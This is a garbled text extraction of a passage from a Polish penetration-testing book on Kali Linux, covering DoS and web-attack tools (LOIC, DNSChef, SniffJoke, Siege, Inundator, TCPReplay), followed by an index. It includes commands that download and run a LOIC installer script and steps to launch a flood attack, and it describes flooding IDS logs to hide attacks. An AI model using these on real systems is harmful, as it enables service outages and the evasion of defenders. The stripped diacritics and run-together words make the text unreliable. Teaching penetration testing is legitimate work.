Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
